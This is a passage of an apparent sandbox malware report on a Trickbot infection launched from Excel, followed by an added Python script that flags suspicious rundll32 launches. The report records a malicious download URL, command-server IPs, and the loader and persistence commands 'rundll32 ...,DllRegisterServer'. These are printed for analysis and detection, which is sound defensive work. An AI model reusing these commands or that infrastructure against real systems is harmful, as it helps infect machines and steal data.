Feb 20, 2021 09:49:11.846560955 CET | 53 | 61865 | 8.8.8.8 | 192.168.2.22
Feb 20, 2021 09:49:11.849558115 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Feb 20, 2021 09:49:11.912435055 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:49:11.916096926 CET5249653192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.074311018 CET53524968.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.078605890 CET5756453192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.137561083 CET53575648.8.8.8192.168.2.22
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.141418934 CET6300953192.168.2.228.8.8.8
                                                                                                                                                                                                                  Feb 20, 2021 09:49:12.232424974 CET53630098.8.8.8192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 20, 2021 09:48:07.978209019 CET | 192.168.2.22 | 8.8.8.8 | 0xb648 | Standard query (0) | www.chipmania.it | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:07.491444111 CET | 192.168.2.22 | 8.8.8.8 | 0xa0c2 | Standard query (0) | ident.me | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:07.557696104 CET | 192.168.2.22 | 8.8.8.8 | 0xfa16 | Standard query (0) | ident.me | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:11.780280113 CET | 192.168.2.22 | 8.8.8.8 | 0x1d23 | Standard query (0) | 38.52.17.84.zen.spamhaus.org | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:11.849558115 CET | 192.168.2.22 | 8.8.8.8 | 0xc63d | Standard query (0) | 38.52.17.84.cbl.abuseat.org | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:11.916096926 CET | 192.168.2.22 | 8.8.8.8 | 0xea66 | Standard query (0) | 38.52.17.84.b.barracudacentral.org | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:12.078605890 CET | 192.168.2.22 | 8.8.8.8 | 0x87a5 | Standard query (0) | 38.52.17.84.dnsbl-1.uceprotect.net | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:12.141418934 CET | 192.168.2.22 | 8.8.8.8 | 0x376d | Standard query (0) | 38.52.17.84.spam.dnsbl.sorbs.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 20, 2021 09:48:08.037940979 CET | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | www.chipmania.it | chipmania.it | | CNAME (Canonical name) | IN (0x0001)
Feb 20, 2021 09:48:08.037940979 CET | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | chipmania.it | | 185.81.0.78 | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:07.551477909 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | ident.me | | 176.58.123.25 | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:07.618220091 CET | 8.8.8.8 | 192.168.2.22 | 0xfa16 | No error (0) | ident.me | | 176.58.123.25 | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:11.846560955 CET | 8.8.8.8 | 192.168.2.22 | 0x1d23 | Name error (3) | 38.52.17.84.zen.spamhaus.org | none | none | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:11.912435055 CET | 8.8.8.8 | 192.168.2.22 | 0xc63d | Name error (3) | 38.52.17.84.cbl.abuseat.org | none | none | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:12.074311018 CET | 8.8.8.8 | 192.168.2.22 | 0xea66 | Name error (3) | 38.52.17.84.b.barracudacentral.org | none | none | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:12.137561083 CET | 8.8.8.8 | 192.168.2.22 | 0x87a5 | Name error (3) | 38.52.17.84.dnsbl-1.uceprotect.net | none | none | A (IP address) | IN (0x0001)
Feb 20, 2021 09:49:12.232424974 CET | 8.8.8.8 | 192.168.2.22 | 0x376d | Name error (3) | 38.52.17.84.spam.dnsbl.sorbs.net | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.chipmania.it

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data

Feb 20, 2021 09:48:08.114717007 CET | 0 | OUT
GET /mails/open.php HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.chipmania.it
Connection: Keep-Alive

Feb 20, 2021 09:48:08.181039095 CET | 2 | IN
HTTP/1.1 200 OK
Date: Sat, 20 Feb 2021 08:48:08 GMT
Server: Apache
Content-Disposition: attachment; filename="10.jjkes"
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Keep-Alive: timeout=1, max=100
Transfer-Encoding: chunked
Content-Type: application/octet-stream
                                                                                                                                                                                                                  Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 2a 96 79 f9 4b f8 2a f9 4b f8 2a f9 4b f8 2a a2 23 fb 2b f3 4b f8 2a a2 23 fd 2b 7e 4b f8 2a a2 23 fc 2b eb 4b f8 2a 01 3b fc 2b f6 4b f8 2a 01 3b fb 2b e8 4b f8 2a a2 23 f9 2b fc 4b f8 2a f9 4b f9 2a 9a 4b f8 2a 01 3b fd 2b d8 4b f8 2a 4e 3a f1 2b f4 4b f8 2a 4e 3a f8 2b f8 4b f8 2a 4e 3a 07 2a f8 4b f8 2a 4e 3a fa 2b f8 4b f8 2a 52 69 63 68 f9 4b f8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a4 73 2f 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1b 00 72 42 00 00 a4 03 00 00 00 00 00 c2 7d 41 00 00 10 00 00 00 90 42 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 8f 44 00 60 01 00 00 80 90 44 00 3c 00 00 00 00 c0 44 00 58 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 46 00 b0 11 00 00 60 81 44 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 81 44 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 42 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 71 42 00 00 10 00 00 00 72 42 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 18 08 02 00 00 90 42 00 00 0a 02 00 00 76 42 00 00 00 00 
00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 15 00 00 00 a0 44 00 00 0a 00 00 00 80 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 70 01 00 00 c0 44 00 00 72 01 00 00 8a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b0 11 00 00 00 40 46 00 00 12 00 00 00 fc 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 1a e6 68 07 ba 91 2f 00 00 33 c9 e8 ff 3c 08 00 6a 00 ff d0 33 c0 c3 cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                  Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$*yK*K*K*#+K*#+~K*#+K*;+K*;+K*#+K*K*K*;+K*N:+K*N:+K*N:*K*N:+K*RichK*PELs/`!rB}AB`F@ D`D<DXp@F`DpD@BX.textqBrB `.rdataBvB@@.data8DD@.rsrcXpDrD@@.reloc@FE@Bhh/3<j3


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Feb 20, 2021 09:48:19.343115091 CET | 45.155.173.242 | 443 | 192.168.2.22 | 49166 | CN=Koqnu, O=Qjvoobim, L=DavhlVuwmxy, C=ZZ | CN=Koqnu, O=Qjvoobim, L=DavhlVuwmxy, C=ZZ | Thu Oct 01 03:17:34 CEST 2020 | Sun Sep 29 03:17:34 CEST 2030 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,0 | 8c4a22651d328568ec66382a84fc505f
Feb 20, 2021 09:49:06.177721024 CET | 193.8.194.96 | 443 | 192.168.2.22 | 49170 | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | Sun Feb 07 20:26:06 CET 2021 | Mon Feb 07 20:26:06 CET 2022 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,0 | 8c4a22651d328568ec66382a84fc505f
Feb 20, 2021 09:49:07.733053923 CET | 176.58.123.25 | 443 | 192.168.2.22 | 49171 | CN=ident.me | CN=R3, O=Let's Encrypt, C=US | Fri Jan 22 12:53:12 CET 2021 | Thu Apr 22 13:53:12 CEST 2021 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
(intermediate certificate in the same chain) | | | | | CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |
Feb 20, 2021 09:49:16.239937067 CET | 193.8.194.96 | 443 | 192.168.2.22 | 49173 | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GB | Sun Feb 07 20:26:06 CET 2021 | Mon Feb 07 20:26:06 CET 2022 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,0 | 8c4a22651d328568ec66382a84fc505f

Code Manipulations

Statistics

Behavior


                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:09:47:37
                                                                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                  Imagebase:0x13f400000
                                                                                                                                                                                                                  File size:27641504 bytes
                                                                                                                                                                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:09:47:43
                                                                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                                                                                                  Imagebase:0xffc50000
                                                                                                                                                                                                                  File size:45568 bytes
                                                                                                                                                                                                                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

General

Start time: 09:47:44
Start date: 20/02/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\BASE.BABAA,DllRegisterServer
Imagebase: 0x820000
File size: 44544 bytes
MD5 hash: 51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2098758914.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2094809366.0000000000324000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2094797786.0000000000324000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2099036393.0000000000878000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2098808409.00000000002F0000.00000004.00000020.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 09:47:45
Start date: 20/02/2021
Path: C:\Windows\System32\wermgr.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wermgr.exe
Imagebase: 0xff2b0000
File size: 50688 bytes
MD5 hash: 41DF7355A5A907E2C1D7804EC028965D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 09:47:45
Start date: 20/02/2021
Path: C:\Windows\System32\wermgr.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wermgr.exe
Imagebase: 0xff2b0000
File size: 50688 bytes
MD5 hash: 41DF7355A5A907E2C1D7804EC028965D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 09:48:50
Start date: 20/02/2021
Path: C:\Windows\System32\taskeng.exe
Wow64 process (32bit): false
Commandline: taskeng.exe {C999D15C-7BEE-4793-989A-0EF4E6A22007} S-1-5-18:NT AUTHORITY\System:Service:
Imagebase: 0xffe70000
File size: 464384 bytes
MD5 hash: 65EA57712340C09B1B0C427B4848AE05
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 09:48:50
Start date: 20/02/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor3154395120\ujBASEmc.rrd',DllRegisterServer
Imagebase: 0xffd70000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
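The process list above shows the two rundll32 invocations that matter for detection: the first-stage loader started from Excel with a relative path and a non-.dll extension (`rundll32 ..\BASE.BABAA,DllRegisterServer`), and the persistence copy relaunched about a minute later by the task scheduler (taskeng.exe) from a randomly named folder under AppData\Roaming, again with a non-.dll extension and the DllRegisterServer export. The following is an added example, not part of the sandbox report: a small Python triage routine that parses rundll32 command lines and scores them on exactly those traits (non-.dll module extension, DllRegisterServer export, relative or AppData\Roaming module path, Office or task-scheduler parent). The three event records are constructed for the example; the two malicious command lines are copied from the report, the benign one is a typical Control Panel launch. Note that taskeng.exe is the Windows 7-era task host; on Windows 10 the parent of a scheduled-task child is the svchost.exe instance hosting the Schedule service, which is why both names are in the parent list.

```python
import re
from dataclasses import dataclass

# Matches "rundll32", "rundll32.exe", or a quoted/unquoted full path to it, followed by whitespace.
RUNDLL32_RE = re.compile(r'^(?:"?[^\s"]*\\)?rundll32(?:\.exe)?"?\s+', re.IGNORECASE)
# Matches the module argument (double-quoted, single-quoted, or bare) and the export after the comma.
MODULE_RE = re.compile(r"""^\s*(?:"([^"]+)"|'([^']+)'|(\S+?))\s*,\s*(\w+)""")

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
TASK_PARENTS = {"taskeng.exe", "svchost.exe"}  # svchost.exe hosts the Schedule service on Windows 10


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon event ID 1 / 4688 style)."""
    image: str
    parent_image: str
    command_line: str


def parse_rundll32(cmdline: str):
    """Return (module, export) for a rundll32 command line, or None if it is not one."""
    m = RUNDLL32_RE.match(cmdline)
    if not m:
        return None
    mm = MODULE_RE.match(cmdline[m.end():])
    if not mm:
        return None
    module = next(g for g in mm.group(1, 2, 3) if g)
    return module, mm.group(4)


def score(ev: ProcEvent):
    """List the suspicious traits of a rundll32 event; empty list when nothing stands out."""
    parsed = parse_rundll32(ev.command_line)
    if parsed is None:
        return []
    module, export = parsed
    reasons = []
    name = module.rsplit("\\", 1)[-1]
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    if ext != "dll":
        reasons.append(f"module extension '.{ext}' is not .dll")
    if export.lower() == "dllregisterserver":
        reasons.append("export DllRegisterServer used as loader entry point")
    if module.startswith(("..\\", ".\\")):
        reasons.append("module given as relative path")
    if "\\appdata\\roaming\\" in module.lower():
        reasons.append("module loaded from AppData\\Roaming")
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by Office application {parent}")
    elif parent in TASK_PARENTS:
        reasons.append(f"spawned by task scheduler host {parent}")
    return reasons


def is_suspicious(ev: ProcEvent, threshold: int = 2) -> bool:
    """Alert when at least `threshold` independent traits co-occur (single traits are common in benign use)."""
    return len(score(ev)) >= threshold


def triage(events):
    """Return [(index, reasons)] for every event that crosses the alert threshold."""
    return [(i, score(ev)) for i, ev in enumerate(events) if is_suspicious(ev)]


# Constructed sample events; the two rundll32 command lines are the ones from the report above.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE",
              r"rundll32 ..\BASE.BABAA,DllRegisterServer"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\taskeng.exe",
              r"C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\QNetMonitor3154395120\ujBASEmc.rrd',DllRegisterServer"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\explorer.exe",
              r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL desk.cpl'),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"[ALERT] event {idx}: {SAMPLE_EVENTS[idx].command_line}")
        for r in reasons:
            print(f"         - {r}")
```

The threshold of two traits is deliberate: a single trait (an AppData path, or DllRegisterServer on its own) fires on legitimate installers, whereas the combination of a non-.dll extension with a scheduler or Office parent is rare outside loaders of this kind. Feed it from whatever produces your process-creation events (Sysmon, EDR export, 4688 with command-line auditing on) and tune `OFFICE_PARENTS` to the Office versions in your estate.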
